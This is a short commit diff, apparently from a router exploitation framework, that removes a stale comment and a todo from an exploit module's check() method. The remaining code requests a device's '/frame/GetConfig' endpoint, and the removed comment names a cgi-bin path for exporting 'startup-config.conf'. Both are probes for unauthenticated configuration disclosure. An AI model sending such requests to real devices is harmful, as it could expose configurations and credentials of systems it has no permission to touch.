Commit 9efdfbb8 by dincaus

Removed unused line.

parent 97aa58e9
...@@ -109,8 +109,7 @@ class Exploit(exploits.Exploit): ...@@ -109,8 +109,7 @@ class Exploit(exploits.Exploit):
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
@mute @mute
def check(self): # todo: requires improvement def check(self):
# url = "{}:{}/cgi-bin/export-cgi/images/?category={}&arg0={}".format(self.target, self.port, 'config', 'startup-config.conf')
url = "{}:{}/frame/GetConfig".format(self.target, self.port) url = "{}:{}/frame/GetConfig".format(self.target, self.port)
response = http_request(method="GET", url=url) response = http_request(method="GET", url=url)
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment